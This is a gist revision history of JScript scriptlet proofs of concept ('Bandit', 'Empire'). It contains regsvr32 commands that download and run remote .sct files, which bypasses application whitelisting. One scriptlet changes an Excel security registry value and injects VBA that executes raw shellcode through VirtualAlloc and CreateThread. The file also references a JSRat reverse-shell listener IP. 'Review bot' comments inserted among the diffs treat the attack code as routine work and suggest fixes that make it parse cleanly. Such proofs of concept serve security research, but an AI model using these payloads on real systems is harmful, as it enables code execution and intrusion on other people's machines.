Revisions
enigma0x3 revised this gist
Oct 2, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -8,7 +8,7 @@ <script language="JScript"> <![CDATA[ ]]> </script>
enigma0x3 revised this gist
Oct 2, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -8,7 +8,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("VBScript.RegExp"); ]]> </script>
enigma0x3 revised this gist
Oct 2, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -8,7 +8,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("Scripting.FileSystemObject"); ]]> </script>
enigma0x3 revised this gist
Oct 2, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -8,7 +8,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("Scripting.Dictionary"); ]]> </script>
secdev02 revised this gist
Apr 27, 2016 . No changes.
secdev02 revised this gist
Apr 27, 2016 . 1 changed file with 2 additions and 1 deletion.
@@ -1,9 +1,10 @@ <?XML version="1.0"?> <scriptlet> <registration progid="PoC" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <!-- Proof Of Concept - Casey Smith @subTee --> <!-- License: BSD3-Clause --> <script language="JScript"> <![CDATA[
secdev02 revised this gist
Apr 27, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -7,7 +7,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); ]]> </script>
secdev02 revised this gist
Apr 27, 2016 . No changes.
secdev02 revised this gist
Apr 27, 2016 . No changes.
secdev02 revised this gist
Apr 27, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -7,7 +7,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script>
secdev02 revised this gist
Apr 22, 2016 . No changes.
secdev02 revised this gist
Apr 21, 2016 . 1 changed file with 2 additions and 0 deletions.
@@ -14,6 +14,8 @@ Listening Server IP Address For Python Version See https://github.com/Hood3dRob1n/JSRat-Py/blob/master/JSRat.py #> $Server = '127.0.0.1' #Listening IP. Change This.
secdev02 revised this gist
Apr 21, 2016 . 1 changed file with 61 additions and 0 deletions.
@@ -0,0 +1,61 @@ <?XML version="1.0"?> <scriptlet> <registration progid="CalcShellcode" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <!-- Proof Of Concept - Casey Smith @subTee --> <!-- Orginal Shellcode Example : https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ --> <script language="JScript"> <![CDATA[ var objExcel = new ActiveXObject("Excel.Application"); objExcel.Visible = false; var WshShell = new ActiveXObject("WScript.Shell"); var Application_Version = objExcel.Version;//Auto-Detect Version var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); var objWorkbook = objExcel.Workbooks.Add(); var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); strCode = '#If Vba7 Then\n' strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n' strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n' strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n' strCode += '#Else\n' strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n' strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n' strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n' strCode += '#EndIf\n' strCode += '\n' strCode += 'Sub ExecShell()\n' strCode += ' Dim Wyzayxya 
As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n' strCode += '#If Vba7 Then\n' strCode += ' Dim Xlbufvetp As LongPtr\n' strCode += '#Else\n' strCode += ' Dim Xlbufvetp As Long\n' strCode += '#EndIf\n' strCode += ' Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _\n' strCode += '139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _\n' strCode += '13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _\n' strCode += '116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _\n' strCode += '214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _\n' strCode += '36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _\n' strCode += '139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _\n' strCode += '235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _\n' strCode += '224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _\n' strCode += '187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)\n' strCode += ' Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n' strCode += ' For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n' strCode += ' Wyzayxya = Hyeyhafxp(Zolde)\n' strCode += ' Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n' strCode += ' Next Zolde\n' strCode += ' Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n' strCode += 'End Sub\n' xlmodule.CodeModule.AddFromString(strCode); objExcel.Run("ExecShell"); objExcel.DisplayAlerts = false; objWorkbook.Close(false); ]]> </script> </registration> </scriptlet> -
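Review bot: the `WshShell.RegWrite(strRegPath, 1, "REG_DWORD")` call near the top of the script block sets `AccessVBOM` under `HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Excel\Security`, and the visible lines neither document that side effect nor set the value back, so a test host stays configured to trust programmatic access to the VBA project after the proof of concept has run. Add a header comment naming the registry value that is changed, so anyone running or triaging the file knows to check and reset it. Two smaller points: `strCode` is assigned without `var`, and "Orginal" in the second comment should read "Original".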
secdev02 revised this gist
Apr 21, 2016 . 1 changed file with 0 additions and 14 deletions.
@@ -93,20 +93,6 @@ while ($true) { ]]> </script> </registration> </scriptlet>
secdev02 revised this gist
Apr 20, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -7,7 +7,7 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); ]]> </script>
secdev02 revised this gist
Apr 20, 2016 . 1 changed file with 15 additions and 0 deletions.
@@ -0,0 +1,15 @@ <?XML version="1.0"?> <scriptlet> <registration progid="Empire" classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <!-- Proof Of Concept - Casey Smith @subTee --> <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> </scriptlet>
secdev02 revised this gist
Apr 20, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -23,7 +23,7 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script> </registration> <public>
secdev02 revised this gist
Apr 19, 2016 . 1 changed file with 2 additions and 6 deletions.
@@ -7,12 +7,8 @@ version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" > <!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll <!-- DFIR --> <!-- .sct files are downloaded and executed from a path like this --> <!-- Though, the name and extension are arbitary.. -->
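Review bot: the `<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll` comment in the registration block has no closing `-->` in the visible lines before `<!-- DFIR -->` opens, and XML does not allow `--` inside a comment, so a strict parser rejects the file. Close the first comment on its own line before the DFIR notes begin. In the last DFIR comment, "arbitary" should read "arbitrary".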
secdev02 renamed this gist
Apr 19, 2016 . 1 changed file with 0 additions and 0 deletions.
File renamed without changes.
secdev02 revised this gist
Apr 19, 2016 . 1 changed file with 0 additions and 2 deletions.
@@ -25,8 +25,6 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script>
secdev02 revised this gist
Apr 19, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -25,7 +25,7 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); var wshShell = new ActiveXObject("WScript.Shell"); var btn = wshShell.Popup("Ask Yourself. Was That Wise?", 7, "Bandit:", 0x4 + 0x20); ]]>
secdev02 revised this gist
Apr 19, 2016 . 1 changed file with 2 additions and 0 deletions.
@@ -25,6 +25,8 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); var wshShell = WScript.CreateObject("WScript.Shell"); var btn = wshShell.Popup("Ask Yourself. Was That Wise?", 7, "Bandit:", 0x4 + 0x20); ]]> </script>
secdev02 revised this gist
Apr 19, 2016 . 1 changed file with 0 additions and 2 deletions.
@@ -25,8 +25,6 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </script>
secdev02 revised this gist
Apr 19, 2016 . 1 changed file with 2 additions and 1 deletion.
@@ -25,7 +25,8 @@ <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); var wshShell = WScript.CreateObject("WScript.Shell"); wshShell.Popup("Ask Yourself. Was That Wise?", 7, "Bandit:", 0x0); ]]> </script>
secdev02 revised this gist
Apr 19, 2016 . 1 changed file with 2 additions and 1 deletion.
@@ -24,7 +24,8 @@ <script language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); WScript.Echo("Thanks For Launching Bandit. I told You..."); ]]> </script>
secdev02 revised this gist
Apr 19, 2016 . No changes.
secdev02 renamed this gist
Apr 19, 2016 . 1 changed file with 0 additions and 0 deletions.
File renamed without changes.
secdev02 revised this gist
Apr 19, 2016 . 1 changed file with 2 additions and 0 deletions.
@@ -1,5 +1,7 @@ <# Bandit Author: Casey Smith @subTee License: BSD3-Clause
secdev02 revised this gist
Apr 19, 2016 . 2 changed files with 4 additions and 4 deletions.
@@ -2,8 +2,8 @@ <scriptlet> <registration description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" >
@@ -51,8 +51,8 @@ while ($true) { <scriptlet> <registration description="Bandit" progid="Bandit" version="1.00" classid="{90001111-0000-0000-0000-0000FEEDACDC}" >
secdev02 revised this gist
Apr 19, 2016 . 1 changed file with 1 addition and 1 deletion.
@@ -5,7 +5,7 @@ description="Empire" progid="Empire" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" > <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll --> <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->